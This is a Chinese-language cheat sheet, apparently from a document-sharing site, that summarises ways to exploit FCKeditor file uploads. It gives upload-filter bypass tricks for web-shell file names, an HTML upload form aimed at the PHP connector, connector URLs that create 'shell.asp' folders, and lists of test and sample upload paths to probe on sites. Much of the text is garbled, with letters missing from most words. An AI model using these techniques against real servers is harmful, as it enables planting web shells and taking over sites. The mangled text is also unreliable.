Fkeitr漏洞利用总结.docVIP

Feditr漏洞利用总结 Feditr漏洞利用总结 查看编辑器版本 Feditr/_hatsne. htl 2. Versin2. 2 版本 Apahe+linux环境下在上传文后面加个.突破！测试通过。 3. Ver sinlt ;=2. 4. 2Frphp在处理PHP上传的地方并未对 edia类型进行上传文类型的控制，导致用户上传任意文！将 以下保存为h tl文，修改a tin地址。 1 t; frid=〃frUpla.d〃entpe=〃ultipart/f r_data〃 atin=〃h ttp://site. /F editr/e ditr/file anager/up lad/php/u pi ad. php?Tpe=edia 〃ethd=〃p st〃gt;Upl adanefil e:It;brgt: It:input tpe=〃file 〃nae=〃Ne File〃size=〃O〃gt;It;brgt; It; inputid=〃b tnUplad〃t pe=〃subi t〃value=〃U plad〃gt; 1 t;/frgt; 4. Feditr文上传”变“下划线的绕过方法 很多时候上传的文例如：s hell. php. r ar或shell, p hp;. pg会变为shell_php;. pg这是新版F的变化。 4.1:提交shell, php +空格绕过 不过空格只支持in系统*nix是不支持的［s hell, php和 s hell. php+空格是2个不同的文未测试。 4. 2：继续上传同名文可变为shell, php;. pg也可以新建 一个文夹，只检测了第一级的目录，如果跳到二级目录就不受 限制。 .突破建立文夹 Fedi tr/editr /fileanag er/nnet rs/asp/nnetr. as p?and=reateFld erap:Tpe =Iageap:urrentFl der=%2Fshe 11. aspap;NeFlderN ae=zap: u uid=124478 997684 F editr/e ditr/f ile anager/br ser/defa ult/nne trs/asp/nnetr. a sp?and =reateFl derap: ur rentFlder 二/ap;Tpe =Iageap;NeFlderN ae=shell. asp 6. Feditr中test文的上传地址 Fedit r/editr/fileanage r/brser/default/nnetrs/1 est. htl Feditr/editr/fil eanager/u plad/test . htl F editr/edi tr/f ilea nager/nn etrs/tes t. htl F editr/ed itr/file anager/n netrs/up ladtest. h tl 常用上传地址 Fe ditr/edit r/filean ager/brs er/default /nnetr s/asp/nn etr. asp?and=Ge tFldersAn dFilesap: Tpe=Iage ap; urren tFlder=/ Feditr /editr/fi leanager/brser/de fault/br ser. htl?t pe=Iagea p;nnet r=nnet rs/asp/nnetr. as p Fedit r/editr/fileanage r/brser/default/br ser. htl ?Tpe=Iag eap;nne tr=HYPERLINK http://site site . %2Ff editr%2Fe ditr%2Ff i leanager%2Fnnet rs%2Fphp%2 Fnnetr . php SP版： Feditr /editr/fi leanager/brser/de fault/br ser. htl?T pe=Iagea p: nnet rennet rs/sp/nnetr. s p 注意红色部分修改为Fedit r实际使用的脚本语言，蓝色 部分可以自定义文 夹名称也可以利用目录遍历，紫色部分为实际网站 地址。 其他上传地址 F editr/_sa ples/defa ult. htl Feditr/_saples/a sp/sapleO 1. asp F editr/_sa ples/asp/saple02. a sp Fedi tr/_sapl es/asp/sa ple03. asp Feditr /_saples/asp/saple 04. asp 一般很多站点都己删目录，可以试试。 Fe